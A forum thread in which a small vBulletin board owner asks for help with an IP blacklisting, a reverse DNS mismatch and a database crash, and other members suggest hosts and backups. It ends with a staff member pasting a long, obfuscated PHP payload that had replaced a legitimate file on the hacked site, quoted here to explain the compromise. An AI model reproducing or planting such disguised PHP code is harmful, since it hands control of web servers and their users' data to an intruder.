Hi,

New to this forum, looking for input on hosting. First, the situation... We've been with our current host for about 2 years and for the most part, good service. Prompt answers to support questions and a good attitude towards the odd stupid ticket on my part. (yes, limited IT skills)

However since the end of August, a) our site went down one Sunday without warning, and b) we've been unable to send out emails twice. Explanation for the site going offline was... "It was a database table crash and I've repaired it for you. We had restarted the server due to some technical issues." I understand routine maintenance done on weekends with possible scheduled downtime. What I don't understand is routine maintenance that apparently involves an unexpected server restart... am I missing something here?

The blacklisting of our IP twice is the more irritating issue. The August block was pretty much all networks as per Spamhaus, and that one was resolved more or less within 72 hours. The recent one earlier this week was Hotmail and Att.net; Hotmail resolved within the usual 48 hours, Att.net has been blocking our IP since last Sunday. Responses to my questions are:

Also I could notice that you've a dedicated IP address here so I've changed your domain mail sending IP address to that one... it will take time to delist the Ip address from att n/w. Your account is on our shared server and a lot of clients using the email service on this server. So if you purchase a vps server here you've your own server and email service on the server only use for your accounts. We've already requested them to delist the Ip from their network region. Since you had a dedicated IP address with us, I've changed the mail server IP address for your domain to that IP address. So it will be fine now.

I feel like we're being taken for a ride. Apart from trying to decipher the above, why are we still being blocked, and should we start expecting this to be a regular semi-monthly occurrence? Can the host not shut down any client spammers that are sharing our IP, within 48 hours? Is this some hard sell for us to upgrade to a VSP? We have an average max of 50 members on the board at any one time.

Is this merely par for the course? I don't want to consider another host if this is normal, just don't like the feeling that we're being screwed. We already pay this host $50.00/month, and I have no motivation to get into VSP concerns. Again, limited IT skills.

Any thoughts welcome.

The fact that your IP was/has been blacklisted would be reason enough for me to move host already.

I would just move to a more reliable hosting company whenever you can, that will save yourself a lot of trouble in the future.
DigitalOcean (https://www.digitalocean.com/pricing/) and Linode (https://www.linode.com/pricing) are 2 excellent VPS hosting companies which are probably cheaper as well.

If that's really no option then there's not a lot you can do about it because you are simply bound to that hosting company.

Well spamhauser seems to blacklist way too many and if that is your only blackilsting I wouldn't worry about it. Hotmail though is a concern.

You can be black listed just for your email server and dns not being set up correctly according to anti spam standards.

I would just move to a more reliable hosting company whenever you can, that will save yourself a lot of trouble in the future.
DigitalOcean and Linode are 2 excellent VPS hosting companies which are probably cheaper as well.

Thanks for the suggestions, I may be looking at these soon.

Well spamhauser seems to blacklist way too many and if that is your only blackilsting I wouldn't worry about it.


They've happened before, and been resolved faster, and therefore I'm not counting them. It's the last couple of months that are beginning to concern me.

You can be black listed just for your email server and dns not being set up correctly according to anti spam standards.

Ok, fair enough... if it's a server issue, shouldn't the host be on top of that? Or as a client am I able to tweak this?

Well it depends on your host really but I do not believe most will set up your dns like that.

Check using the tool here.

http://mxtoolbox.com/SuperTool.aspx

If you see the issue then tell your host.

If you get blacklisted by Google and Microsoft then you have a bigger problem.

It depends.
If you have an unmanaged server then the host is not responsible for anything that's installed or misconfigured on your server. If it's a managed server however, they have a lot more responsibility.

Thanks for the link to mxtoolbox. A mailserver test of our IP did in fact error:

SMTP Reverse DNS Mismatch
What you see when your domain has this problem
Reverse DNS does not contain the hostname Details area Ignore
More Information About Smtp Reverse Dns Mismatch
The forward lookup (A) of the hostname hostname did not match the reverse lookup (PTR) for the IP Address.

Example of a correctly matching pair of records:

(A) lookup for smtp.mxtoolbox.com resolves to 208.123.79.38

(PTR) lookup for 208.123.79.38 reverses to smtp.mxtoolbox.com

Additional Information

Some receiving mail servers may use this as an indication of a possible spam source in a scoring system. Most will not reject incoming mail solely on this basis. We recommend that you contact your ISP and ask them to setup a reverse record (PTR) that matches the hostname of your mail server.

Could this really be why we've been blacklisted by att.net for a week as of today? I would think the ISP would have stumbled upon this by now. Anyway, forwarding to them.

--------------- Added 1443972040 at 1443972040 ---------------

It depends.
If you have an unmanaged server then the host is not responsible for anything that's installed or misconfigured on your server. If it's a managed server however, they have a lot more responsibility.

I believe it's managed but would have to double check.

Yes, that could absolutely be the issue.

Managed just means that your host takes care of the configuration, etc. I would contact them if I was your and have them fix that.
You will need a dedicated IP though and your smtp IP must match.

If that is your only blacklist though I would not worry and if that is your only issue reported on mxtools you should be ok. Just fix the Hotmail issue by contacting them and filling out the forms, etc.

You will need a privacy page, an opt in, opt out, etc and be sure to have everything all set before you submit the form to them.

Will do. Thanks again for the responses, I've been trying to get a handle on how serious this situation is.

Besides the blacklisting issue, it's still worrying that your site was offline due to a database crash.
They also mentioned "We had restarted the server due to some technical issues.", I would always expect the host to tell me exactly what was going wrong, not a vague description.

Yeah Dave, I did not even catch that but I do not suspect that issue to have anything to do with the blacklisting.

My first thought on the database issue is that he went beyond server resources which is easy to do when sending out mass mails or even doing back ups. Error logs or even just the database error itself would help with this. :)

My second thought would be to maybe start looking for a new host. :)

Besides the blacklisting issue, it's still worrying that your site was offline due to a database crash.
They also mentioned "We had restarted the server due to some technical issues.", I would always expect the host to tell me exactly what was going wrong, not a vague description.

Agree. I had to push to get that much, and it's not the first time. Routine maintenance implies a scheduled server reboot (if necessary) and some kind of heads-up to those affected.

RB67, here's the response to my forward earlier today...

Hello,

The Ip address (edit) on our shared server is only using for your email accounts. The att network here black listed emails from your account, it may due to the presence of spam looking words or content on it.

Or it may due to recent bulk amount of emails that sent from your forum site to the customers on their network and some of clients in there may complained about this. So they black listed that ip.

You can delist the ip through the url http://rbl.att.net/end_user_request1.html .

Also check http://www.att.net/general-info/521.html

If you purchase a vps server here, Email service on the server will only used for your email accounts.

That Ip already has a rDNS which pointed to our server. However to avoid the forward lookup (PTR) related issue I've informed our network team to change the rDNS to your domain name.

The initial rationale is possible, but we're a small board, I'd estimate around 50-75 emails a week or less. Part of that is a scheduled "Happy Birthday" to those few members it applies to... and the rest is mostly logon issues, PM notifications and thread subscriptions. There are no bulk mailouts. Someone may be complaining, however it seems unlikely.

Followed by the pitch for VPS once again. As far as I understand it, this would be serious overkill in our case, and I'm already questioning the current $50.00/month, nevermind additional charges. And issues.

Finally at the end, an acknowledgement of what they seem to have missed. Thanks to you RB67 for the advice.

Migrating to another host... not thrilled at the prospect but it's something to think about more seriously now. Meantime hoping that today's fix is the real problem with att.net.

ATT is very easy to get blacklisted from. Perhaps I didn't read this thread thoroughly enough because I thought your only blacklisting was spamheuisen?

You will have to jump through some hoops if blacklisted through att and chances are other services may do it as well. Bell south is another one that blacklists very easily.

You will most likely need an opt in and opt out link and send them privacy page links among other things. I am not sure if fixing the dns issues will be enough.

Temporarily you could add a note into your registration page to tell people that certain emails may be blocked and to use another email account.

My mistake, we've been listed by Spamhaus in the past- this time only att.net.

At least that was the case until this morning. "554 5.5.4 Relaying denied. IP name lookup failed... This system will not accept messages from servers/devices with no reverse DNS..." Comcast, aol, nctc, among others are all rejecting emails.

I'm told they're "checking this". If this clears up will verify our status with att.net. Does little to improve the growing lack of confidence in our host.

Switch, during the time it's taken you to login here, type all of this, come back and read replies plus the tickets submitted to your host... you could have been switched already with DNS fully propagating today :p.

- Hosts are a dime-a-dozen, true.
However at the same time....
- Waiting to find a good host is like a dollar waiting on a dime... still need someone to do the 10% to make that dollar work else its simply not 100% and your site whether its personal/business/hobby/other to you should be at 100% all the time regardless of the content else why pay for it?

Once you start receiving long drawn out explanations as to why something is broke or not working instead of "issue resolved" it begs the question; Is the host actually assisting and looking into it, if so and they know what they're doing then the explanation every time should be followed with "issue resolved" or similar. Some issues though do take time to look into, so by giving them a few days to look into something you're also showing a form of consideration - after all some move hosts only to find sometimes that an issue follows them i.e. it was not a hosting related issue then you must re-tell your tall tale of errors to the new host for assistance - case in point give them some time on most issues, if its not resolved in 24 upwards of 72 hours then start looking elsewhere for hosting (imo). Do you truly need a VPS? If a small site w/ just a few emails then no - either something else is amiss here or the host simply can't tell you what's happening because they have no clue but at the same time they don't like it either - by moving you a to a vps this makes the email issue and others go poof for a while until you're truly hammered then ohhh boy be careful, gonna be "now you need a dedicated server" when in fact the entire time you only needed a knowledgeable host.

If it's not something along those lines then it's usually "your script, vBulletin is doing it all, it's the devil!" well they don't usually say it's the devil but the simple blame it on this script if we can't comprehend it, is usually what occurs followed by one of you stating to us or vBulletin staff themselves that the script "did it" to which laughter ensues, no truly it does we don't laugh at you, we laugh at your host because its honestly quite comical, Sunday Funnies aside :rolleyes:.

Thanks for the thoughts, TLS. You're absolutely right- I have no desire to see these issues follow me because I misunderstood the causes. I need to be certain before committing to moving our site. And as far as I can see, a VPS is sheer overkill.

I can't help noting your sig- the name of the recommended host is the one this thread is about.

If you are looking for a good reliable VPS host for less I suggest http://www.interserver.net/. They are who I use. My package only costs me $33.00 a month and I run several pages off it. Customer service is excellent and they are prompt and helpful with support issues and do not give you a run-a-around in answers. :)

When it comes to shared hosting, I really like https://www.stablehost.com/
They are not a EIG company. :) (Which is the horrible company that buys up almost every single shared hosting business)

I run some of my sites on it as well.

Thanks for the recommends, I'll check out Interserver and Stablehost.

Emails seem to be back to normal this morning. I'm going to do some research and consider a move in November.

Whoa... you're not kidding about EIG. Never heard of them until now. http://www.linux-depot.com/non-endurance-international-group-eig-hosting/

Thanks for the thoughts, TLS. You're absolutely right- I have no desire to see these issues follow me because I misunderstood the causes. I need to be certain before committing to moving our site. And as far as I can see, a VPS is sheer overkill.

I can't help noting your sig- the name of the recommended host is the one this thread is about.

Ahh then in that case I must tell you I'm slightly biased when it comes to them, I'm no liar I tell the truth :cool:. I try to be as unbiased as possible at all times but I surely do love me some URLJet! Without seeing the ticket myself (I handle custom development at URLJet for vBulletin sites I don't provide normal ticket support) I honestly can't say one way or another but I'm glad I didn't know that until after my long spill above lol, it at least keeps me up appearance sake wise ahh laugh at me not with me I'm silly at best ;). If you PM me the ticket number I'll check to see if I notice anything other staff members might not have noticed - after all a second set of eyes never hurt anything... only two cooks in the kitchen killed the soup so that's why you can look but you can't touch gosh I'm full of them tonight eh? One-Liners!

Remember though, no matter what anyone else says there is always a point where you don't want to deal with something anymore - don't let it get to that point else you'll be resentful whether intentional or not... subconsciously speaking as it were but then again, subconsciously speaking I'm Superman and how'd that work out for me? haha :D

It is not very easy for a shared host to set the reverse dns up correctly. I would not be so hard on the host about this but I would really want to know what caused the database issues.

Did you get database error notifications? Can you post the exact errors?

Made me laugh, TLS. :) We've been with this host for two years, and I'm trying to figure out whether there is a real change in the level of service or if it's just my perception. If the former, then I think we may be able to spend a little less per month and see fewer issues.

You have access to URLJet tickets! Outstanding. You'll see that the responses are certainly prompt - if at times somewhat cryptic for a low-tech person. I'm interested in your take on this.

RB... thanks, good to know. Error as follows with related conversation:

Database error in vBulletin 4.2.1:

Invalid SQL:

SELECT post.postid, post.pagetext, IFNULL( user.username , post.username ) AS username, dateline
FROM post AS post
LEFT JOIN user AS user ON (user.userid = post.userid)
WHERE threadid = 11118
AND visible = 1

ORDER BY dateline ASC
LIMIT 0,250;

MySQL Error : Table './(edited)/user' is marked as crashed and should be repaired
Error Number : 145
Request Date : Sunday, August 23rd 2015 @ 02:51:48 PM
Error Date : Sunday, August 23rd 2015 @ 02:51:49 PM

And the ticket conversation.



Contact 08/23/2015 10:45
Site appears to be offline and database errors but no changes were made that I'm aware of. Multiple errors in the admin email, example below. Can you advise on our situation?



Staff 08/23/2015 10:54
Hi ,

Your user table was crashed..I've repaired and the site is running as expected...Please give a check
How would you rate this reply? Poor Excellent



Contact 08/23/2015 10:55
Outstanding. Thanks... how did this happen?
G


Staff 08/23/2015 10:55
Hello,

I'm doing a mysql repair on your database to repair the crashed tables.
It will be finished with in next 15 minutes. Now your site is loading.



Contact 08/23/2015 11:23
Thanks again, we seem to be back.

What happened?



Staff 08/23/2015 11:24
Hello,

It was a database table crash and I've repaired it for you.


Contact 08/23/2015 11:25
I understand that. What happened to make the database crash.

Staff 08/23/2015 11:27
Hello,

We had restarted the server due to some technical issues.

Contact 08/23/2015 11:31
Wouldn't a full, planned restart suggest closing any resident databases beforehand and advising your customers... as opposed to a repair and possible corruption issues?


Staff 08/23/2015 11:33
Hello,

It isn't an expected one.
Our maintenance works are always scheduled at off peak hours. I hope you understand it.


Contact 08/23/2015 11:39
I don't understand routine maintenance that involves an unexpected server restart. However, we seem to be back with no related issues.

Thanks for the quick response.

There are some maintenance updates that require a database restart but who knows the reason. I know there was a phpadmin update lately so maybe they were updating that.

If you do move to another host and if it is a shared host be sure to address your dns problems first because the ones with dns set up correctly for email may be few and far between. Also remember that a server move can sometimes be a real chore as well depending on the size of your site, etc.

Well one thing is for sure, routine maintenance can require a restart but a table crashing usually stems from something else, we need to find out why it crashed and ensure it doesn't happen again. I've pm'd you back but I want this thread to stay on topic; Flibnipktz asked for advice so lets give him solid advice no matter what is found to be the culprit... along the way some advice can always be given then in the end reviewed to make a well informed decision ;). Some advice may not even apply to this situation but others who find this thread after having similar db errors (if they search and somehting in your post comes up etc) might try some advice given and it work for them the point being sometimes not all advice is good for you but for others it might be... take that with a grain of salt because it does not apply to every situation.

I say keep most of it in PM because to me... how I feel about this is even if I'm not paid for this to me it feels like a paid request being discussed in public which I know its not - this is just me being nice with only a little effort involved yet I'd rather keep some stuff in PM's and have valued members contribute and give good solid advice instead of seemingly derailing your thread! So We'll keep most of this to PM's and if something comes up that explains it and I can elaborate on that in a "tutorial" or "if this ever happens to you, this might be the cause" type of way in this thread then I certainly will :cool:.

Edit: I deleted some older pm's my inbox was full, fixed now.

The user table crashing is rather concerning, you should definitely make backups until you're sure that everything is stable again.

RB67 - You could be right, the downtime may have been entirely legit. But I don't know one way or another, and that's what irritates. Never mind the possibility of this happening in future. Agree about this being a chore. I'd prefer not to if it's not necessary, which is why I've appreciated the feedback in this thread.

TLB- PM's are fine. I'm not looking to trash any host... just want the service we're paying for. I'm amazed at how small the world is sometimes. :D

Dave - Thanks. I think we do have an automated backup as part of our package but may be looking at doing my own, given our situation.

Yep, it's always a good idea to have off-site backups.

Don't forget with your host, hourly cron r1 backups are ran. I still run manual backups no matter what which is what Dave meant by off-site ;). Usually with backups they must be restored and if you do any type of work its best to run your own backups and restore if required instead of waiting on support tickets even if the host is lightning quick, the developer can be quicker if backups are handy ;).

Checking this now for you and until I know what is going on I prefer to keep it in pm's, once we know what the issue is then we spill the beans here so others can benefit from it :D.

I overuse smilies :rolleyes: :cool:

Sounds good, TLS, PMs it is. Smileys and gifs will one day eliminate text, place your bets. :D

Fyi... Actually got a response from att.net's attcustomercare@att.com email this morning on our blocklist issue, in less than 20 minutes. Was not expecting that. They've confirmed the IP has been delisted and to check in 24 hours.

Also will have to make a habit of keeping a local copy of our site. Good common sense.

Sounds good, TLS, PMs it is. Smileys and gifs will one day eliminate text, place your bets. :D

Fyi... Actually got a response from att.net's attcustomercare@att.com email this morning on our blocklist issue, in less than 20 minutes. Was not expecting that. They've confirmed the IP has been delisted and to check in 24 hours.

Might be a while, planet of the apes evolution of the movies while lol... at least they subsitute for tone in the meantime! Good to hear regarding att.com removing the red flag :D.

Also will have to make a habit of keeping a local copy of our site. Good common sense.

^ That is the first and absolutely most important of being a forum owner. Always run regular backups and even if automated RUN your own backup manually at least once per week in my personal and professional opinion. If you run a backup at least once a week and any type of automatic backups fails its easier to restore a site from a week ago then to start over from scratch because of a botched backup(s). I've seen automated backups and both manual backups corrupted before so every once in a while be sure to test the lat backup made to ensure that the backups your running are valid and can be restored.

MOST IMPORTANT THING EVER AS A FORUM OWNER IS TO RUN A BACKUP OF YOUR FILES AND DATABASE OFTEN.

Okay so after working with Flibnipktz on his issue it was determined that there was something else "at play" on the site. It was an issue that would have followed him to a new host most certainly however this was not related to his email problems from what was seen. I will get with him tomorrow to see what specifics he will allow me to share if any, after all that's his prerogative on what is to be disclosed regarding his site.

Edit: As mentioned below by Flibnipktx, his site was hacked and some valid files replaced with files of the same name containing nothing but base64 code.

What I found odd was the fact the files replaced, must of had very similar "default" vBulletin code in them because they functioned as normal (example image.php was all encoded/payload/base64 and with different timestamp) despite having the following contents:

<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(`(`-^(:(`(`+`(^+_(-(:(`(.+{(_+_(-(_+`+_(-)](^(.(,({(:+`(:+|(,)](:({(]+`(:)](:(`(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+`(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`+{(],&(:)](:(`(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&(`+`(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-(`(](:(`(^(:+`(,+{(:,&(]+`(.(](:)]+_(--_(_(^(^(:(,+`(,-^(:+_(-(_(:(]+`(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^(`(.(:({(,)](.(`(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(`,&(`(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-(`(,({(`(.(:+_(-(,-_(:-_+_(-+`(.-_(.(]+_(-({(]-_(^(,(,(`(,(^(:+_(-(.,&(,(:(:+|(,(](_+`(.-^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^(`(_(,(.(,+`(.+_(-(.+`+_(--^(:+{+_(-({(:-_(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+`(]-_(:+_(-(`(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+`(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+`(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.(`(.(,,&(`({(`(_(,(.(,(](.(.(:+|(,(](`+{(]-^(.)](`+`(]+|(:(`+_(-+_(-(^+{(](.(`+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(](`(_+_(-(](,-^(:,&(:-_(](.(`(`(,+|(_(:(`-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)](`-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+`(`(.(,(](`-^(]+{(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,(`(_(:(_(^+_(-(:+`(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_(`-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+`(:(:(,(^(_,&+_(-(.+_(-+_(-(](`(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_(`+{(^(`(,(,+_(-)](:(:(.(,(](.(`(]+_(-+`(.(:(.(_(,-^(_(.+_(-+`(^(^+_(-)](`(^(`(,(](_(_(.(^(`(`(](:(`+_(-)](:(`(^(`(,+{(](:(`(^(.)](,(:(.(:(,-_(_,&(`+`(]+|(:(.+_(-+_(-(^+{(](`(_(,(_(](^(](:(.+_(-({(:({(:(`+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&(`-_(],&(:,&(`+_(-(](.(_+|+_(-+`(^(_(,,&(`+{(`(,(](:(.({(.+`(.+|(:(^(,(`(.+`(](^+_(-(`(](:(`(_(:-_(:+_(-(_(:(:(`(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^(`+`(`({(.+`(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+`(,-_(`(,(](:(.({(]-^(.(^(`({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+`(](.(`(`(,+|+_(-+_(-(_(`(:(_(_+|(,,&(,-_(.+{(:(](:+`(,(_(:+|+_(-)](.-_(`-^(]-_(.(:(_,&(](:(:(_(`+{(_(.(.+`(.(:+_(-({(.(^(:(^(:(](.(_(^+`+_(-,&+_(-({(:(`(`+_(-(]-^(.(:(](:(`+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{(`(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(`)]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](`,&(,(^(_({(.+`(.-_(.-^(,-^(.(_+_(--^(^(_(,({(`-^(`,&(,(^(`+`(^+_